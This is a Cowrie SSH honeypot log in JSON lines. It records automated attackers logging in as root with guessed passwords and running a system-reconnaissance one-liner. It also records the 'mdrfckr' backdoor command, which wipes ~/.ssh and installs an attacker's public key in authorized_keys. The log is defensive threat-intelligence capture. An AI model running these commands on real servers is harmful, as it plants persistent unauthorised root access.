\"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T11:12:57.661512Z","src_ip":"212.227.125.160","session":"2110fb6531ed"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:12:57.661994Z","src_ip":"212.227.125.160","session":"2110fb6531ed"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:12:57.663347Z","src_ip":"212.227.125.160","session":"2110fb6531ed"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T11:12:57.664870Z","src_ip":"212.227.125.160","session":"2110fb6531ed"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:12:57.665595Z","src_ip":"212.227.125.160","session":"2110fb6531ed"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:12:57.666384Z","src_ip":"212.227.125.160","session":"2110fb6531ed"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T11:12:57.667699Z","src_ip":"212.227.125.160","session":"2110fb6531ed"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T11:12:57.668418Z","src_ip":"212.227.125.160","session":"2110fb6531ed"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:12:57.668952Z","src_ip":"212.227.125.160","session":"2110fb6531ed"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:12:57.669445Z","src_ip":"212.227.125.160","session":"2110fb6531ed"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:12:57.670283Z","src_ip":"212.227.125.160","session":"2110fb6531ed"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:12:57.670951Z","src_ip":"212.227.125.160","session":"2110fb6531ed"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T11:12:57.835003Z","src_ip":"212.227.125.160","session":"2110fb6531ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:12:57.835939Z","src_ip":"212.227.125.160","session":"2110fb6531ed"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:12:57.837237Z","src_ip":"212.227.125.160","session":"2110fb6531ed"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":39234,"dst_ip":"1.2.3.4","dst_port":22,"session":"caac35e5f60d","protocol":"ssh","message":"New connection: 27.112.79.123:39234 (1.2.3.4:22) [session: caac35e5f60d]","sensor":"my-vps","timestamp":"2025-08-28T11:13:09.303507Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:13:09.304302Z","src_ip":"27.112.79.123","session":"caac35e5f60d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:13:09.572186Z","src_ip":"27.112.79.123","session":"caac35e5f60d"}
{"eventid":"cowrie.login.success","username":"root","password":"xsw2#EDC","message":"login attempt [root/xsw2#EDC] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:13:10.687908Z","src_ip":"27.112.79.123","session":"caac35e5f60d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:13:11.235760Z","src_ip":"27.112.79.123","session":"caac35e5f60d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:13:11.236467Z","src_ip":"27.112.79.123","session":"caac35e5f60d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:13:11.237695Z","src_ip":"27.112.79.123","session":"caac35e5f60d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:13:11.512657Z","src_ip":"27.112.79.123","session":"caac35e5f60d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:13:12.105321Z","src_ip":"27.112.79.123","session":"caac35e5f60d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:13:12.106006Z","src_ip":"27.112.79.123","session":"caac35e5f60d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:13:12.374205Z","src_ip":"27.112.79.123","session":"caac35e5f60d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:13:12.375075Z","src_ip":"27.112.79.123","session":"caac35e5f60d"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":39244,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fe3bb08901d","protocol":"ssh","message":"New connection: 27.112.79.123:39244 (1.2.3.4:22) [session: 3fe3bb08901d]","sensor":"my-vps","timestamp":"2025-08-28T11:13:12.634465Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:13:12.635623Z","src_ip":"27.112.79.123","session":"3fe3bb08901d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:13:12.896983Z","src_ip":"27.112.79.123","session":"3fe3bb08901d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:13:13.987632Z","src_ip":"27.112.79.123","session":"3fe3bb08901d"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:13:15.251398Z","src_ip":"27.112.79.123","session":"3fe3bb08901d"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":36698,"dst_ip":"1.2.3.4","dst_port":22,"session":"595db65d98cc","protocol":"ssh","message":"New connection: 27.112.79.123:36698 (1.2.3.4:22) [session: 595db65d98cc]","sensor":"my-vps","timestamp":"2025-08-28T11:13:15.512470Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:13:15.513585Z","src_ip":"27.112.79.123","session":"595db65d98cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35450,"dst_ip":"1.2.3.4","dst_port":22,"session":"b911a8b6abbf","protocol":"ssh","message":"New connection: 212.227.235.229:35450 (1.2.3.4:22) [session: b911a8b6abbf]","sensor":"my-vps","timestamp":"2025-08-28T11:13:15.638191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:13:15.646121Z","src_ip":"212.227.235.229","session":"b911a8b6abbf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:13:15.776522Z","src_ip":"27.112.79.123","session":"595db65d98cc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:13:16.003332Z","src_ip":"212.227.235.229","session":"b911a8b6abbf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:13:16.878325Z","src_ip":"27.112.79.123","session":"595db65d98cc"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:13:16.916928Z","src_ip":"212.227.235.229","session":"b911a8b6abbf"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:13:17.140609Z","src_ip":"27.112.79.123","session":"595db65d98cc"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:13:17.141734Z","src_ip":"27.112.79.123","session":"caac35e5f60d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:13:17.371428Z","src_ip":"212.227.235.229","session":"b911a8b6abbf"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T11:13:17.372167Z","src_ip":"212.227.235.229","session":"b911a8b6abbf"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:13:17.372622Z","src_ip":"212.227.235.229","session":"b911a8b6abbf"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:13:17.373528Z","src_ip":"212.227.235.229","session":"b911a8b6abbf"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T11:13:17.374533Z","src_ip":"212.227.235.229","session":"b911a8b6abbf"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:13:17.375278Z","src_ip":"212.227.235.229","session":"b911a8b6abbf"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:13:17.376004Z","src_ip":"212.227.235.229","session":"b911a8b6abbf"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T11:13:17.376991Z","src_ip":"212.227.235.229","session":"b911a8b6abbf"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T11:13:17.377691Z","src_ip":"212.227.235.229","session":"b911a8b6abbf"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:13:17.378344Z","src_ip":"212.227.235.229","session":"b911a8b6abbf"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:13:17.378854Z","src_ip":"212.227.235.229","session":"b911a8b6abbf"}
